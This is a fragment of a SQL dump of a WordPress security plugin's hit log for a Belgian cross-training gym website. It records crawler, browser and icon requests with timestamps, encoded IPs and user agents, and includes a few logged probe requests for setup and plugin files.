(73632, 1495777340.101462, 3024883600, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73633, 1495778197.422926, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73634, 1495779202.267367, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73635, 1495780096.045287, 1123632542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73636, 1495780760.762730, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73637, 1495780761.360603, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73638, 1495780761.845293, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73639, 1495780762.329850, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73640, 1495780763.477716, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73641, 1495780764.017519, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73642, 1495780764.589355, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73643, 1495780765.121214, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73644, 1495780765.603063, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73645, 1495780766.141579, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73646, 1495780766.671462, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73647, 1495781929.521590, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73648, 1495785054.729152, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73649, 1495785055.277709, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73650, 1495785055.770070, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73651, 1495785056.333321, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73652, 1495785057.415255, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73653, 1495785057.932651, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73654, 1495785058.594214, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73655, 1495785060.062171, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73656, 1495785060.531738, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73657, 1495785060.996587, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73658, 1495785061.492300, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73659, 1495786785.432399, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73660, 1495787384.975687, 1123632542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73661, 1495789519.437893, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73662, 1495789520.034913, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73663, 1495789520.537817, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(73664, 1495789521.015503, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73665, 1495789521.514379, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73666, 1495789521.979133, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73667, 1495789522.618645, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73668, 1495789523.159967, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73669, 1495789523.810490, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73670, 1495789524.294421, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73671, 1495789524.798243, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73672, 1495790144.566187, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73673, 1495793795.129115, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73674, 1495795305.469154, 1123632542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73675, 1495799579.725151, 876183356, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(73676, 1495799584.272254, 876183356, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(73677, 1495799654.594737, 2637637405, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73678, 1495799655.064132, 2637637405, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73679, 1495802828.956059, 1834609551, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73680, 1495802830.615050, 1834609551, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73681, 1495802834.091687, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73682, 1495802837.088656, 1834609551, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73683, 1495802849.452117, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73684, 1495802851.074173, 1834609551, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73685, 1495802937.404529, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73686, 1495802939.060261, 1834609551, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73687, 1495802967.387085, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73688, 1495802968.893859, 1834609551, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73689, 1495812164.441999, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(73690, 1495812165.907839, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(73691, 1495812165.924033, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(73692, 1495812166.496631, 3587417960, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(73693, 1495822522.884971, 872366427, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73694, 1495829513.399134, 876055784, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Java/1.8.0_121'),
(73695, 1495829662.186659, 2996485392, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(73696, 1495829666.242604, 2366145567, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(73697, 1495837768.691682, 1338303462, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73698, 1495842898.715886, 2637637509, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73699, 1495846583.181256, 2637637406, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73700, 1495846583.937402, 2637637406, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73701, 1495846584.617548, 2637637406, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73702, 1495847727.833893, 3098069115, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/web/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73703, 1495847955.707259, 3098069115, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/news/wp-admin/setup-config.php?step=1', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73704, 1495848892.311467, 2303381350, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73705, 1495849449.920579, 657097413, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/uploads/index.php', 'http://crosstrainingcenter.be/wp-content/uploads/index.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(73706, 1495850718.407675, 3281714129, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wysija-newsletters/readme.txt', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(73707, 1495857023.398466, 1338303462, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73708, 1495866358.356047, 3657083455, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73709, 1495868783.657675, 1834609551, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73710, 1495868784.727632, 1834609551, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73711, 1495868786.524921, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73712, 1495868787.727944, 1834609551, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0'),
(73713, 1495869441.382176, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73714, 1495869441.871866, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73715, 1495869442.369304, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73716, 1495869442.840005, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73717, 1495869443.335433, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73718, 1495869443.788055, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73719, 1495869444.509519, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73720, 1495869445.056427, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73721, 1495869445.486229, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73722, 1495869446.031231, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73723, 1495869446.451997, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73724, 1495876065.643273, 2809283056, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73725, 1495876070.285797, 2809283056, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73726, 1495876070.853843, 2809283056, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73727, 1495876071.414855, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73728, 1495876072.460006, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73729, 1495876073.637207, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73730, 1495876074.646517, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73731, 1495876075.699517, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73732, 1495876078.138635, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73733, 1495876079.158493, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73734, 1495876080.343851, 2809283056, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(73735, 1495876081.384203, 2809283056, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-G925F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36'),
(73736, 1495877008.584190, 1123632542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73737, 1495877009.062251, 1123632542, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(73738, 1495879501.251643, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/eg.php', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(73739, 1495880154.345309, 3657083455, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73740, 1495882685.874322, 3657083455, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73741, 1495885955.534448, 3657083455, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73742, 1495890889.203824, 3657083455, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(73743, 1495893378.157248, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73744, 1495893378.737295, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73745, 1495893379.156047, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73746, 1495893379.605287, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73747, 1495893380.603747, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73748, 1495893381.025689, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73749, 1495893381.457593, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73750, 1495893382.356034, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73751, 1495893386.249511, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73752, 1495893386.673002, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73753, 1495893387.120702, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73754, 1495893387.919864, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73755, 1495893388.428769, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73756, 1495893389.055312, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(73757, 1495899184.832765, 1053970098, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
